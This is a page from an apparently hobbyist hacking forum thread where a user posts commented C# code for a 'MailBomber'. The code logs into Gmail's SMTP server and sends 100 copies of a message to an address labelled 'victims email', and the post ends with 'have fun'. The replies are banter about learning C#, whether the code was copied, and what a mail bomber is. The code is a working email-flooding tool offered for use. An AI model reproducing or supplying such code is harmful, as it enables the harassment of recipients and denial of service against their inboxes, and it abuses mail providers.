[C#] MailBomber

Posts 1–15 of 24 · Page 1 of 2
[C#] MailBomber
on top under all other using lines:
Code:
using System.Net.Mail;
Create a button, double click it and add this code:
Code:
            button1.Enabled = false; //disable the button
            int numsend = 0; //keeps track of the amount of mails sent
            MailMessage message = new MailMessage(); //new message

            message.From = new MailAddress("youremail@gmail.com"); //your email
            message.To.Add(new MailAddress("victimsemail@wtfbbq.com"); //victims email

            message.Subject = "The subject"; // subject
            message.Body = "The content of the email"; // content
            SmtpClient client = new SmtpClient(); // create a new smtp client
            client.Host = "smtp.gmail.com"; // gmail smtp server
            client.Port = 587; //gmail smtp port
            client.EnableSsl = true; //gmail smtp requires Ssl to be enabled
            client.UseDefaultCredentials = false; // do not use the default credentials
            client.Credentials = new System.Net.NetworkCredential("youremail@gmail.com", "yourpassword"); // the credentials it should use to log in
            while (numsend < 100) //while it hasnt sent 100 mails
            {
                client.Send(message); //send the mail
                numsend++; //increase the number of sent emails
            }
            button1.Enabled=true; //re-enable the button
Everything is commented, have fun
is for Application Form or Console??
Quote Originally Posted by devjin95 View Post
is for Application Form or Console??
omfg are you serious ?
Quote Originally Posted by devjin95 View Post
is for Application Form or Console??
I dont know if it works for a console project(tested on a windows forms application).
Can't hurt to try I guess
Quote Originally Posted by devjin95 View Post
is for Application Form or Console??
it says button1.enable
do u think console has button? plz think b4 u post.
Since when do you know C#?
Quote Originally Posted by zeco View Post
Since when do you know C#?
He knows c++ so I'd say it was fairly easy for him to pick up c#. C# is what you get when c++ and java compilers have sex and microsoft is all pro-life about their relationship and slaps some .NET in there.
btw, thanks for this HD, I couldn't figure out the mail namespace before this. nice
copypasta no credits
Quote Originally Posted by teat View Post
copypasta no credits
Any proof that this isn't his source?
Quote Originally Posted by rwkeith View Post
Any proof that this isn't his source?
Well idk, but it prbly isn't. HD can't code C#... I think. Plus I've never seen HD make something as stupid as a mailbomber, which I still don't know what it is... =/
Quote Originally Posted by why06 View Post
Well idk, but it prbly isn't. HD can't code C#... I think. Plus I've never seen HD make something as stupid as a mailbomber, which I still don't know what it is... =/
How dare you call me a CPer I'll banish you to hell from this moment on...
C# is easy to learn if you know C++ since it has the same syntax as C++
Yes I made this, and lol @ the newfag that said I copy pasted it, I can assure you I did not.
I might write up a C++ version of a mailbomber soon, if I have the time to remove the dust of my winsock skills xD
What is a mail bomber.... seriously I've never got the concept. =/
My bad. apologies ... *bows to HD*

I should have known to trust you over some nub, but I didn't know you used C# before...
Quote Originally Posted by why06 View Post
My bad. apologies ... *bows to HD*

I should have known to trust you over some nub, but I didn't know you used C# before...
I didn't It is my first time using C#, just made this to show any VBfag that visits this section they should either start using C# since its better and can do the same thing or they shud gtfo because C# is too pro for them
Quote Originally Posted by Hell_Demon View Post
I didn't It is my first time using C#, just made this to show any VBfag that visits this section they should either start using C# since its better and can do the same thing or they shud gtfo because C# is too pro for them
Or, we should just change VB to C# section. Hmm, I'm looking at learning C# after I do C++. But we all know that'll be a while.

And, yeah what's a mail bomber? By the name, it sounds some sort of a mail spammer? Kinda like a nudge bomb on MSN.
Posts 1–15 of 24 · Page 1 of 2
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Talk with us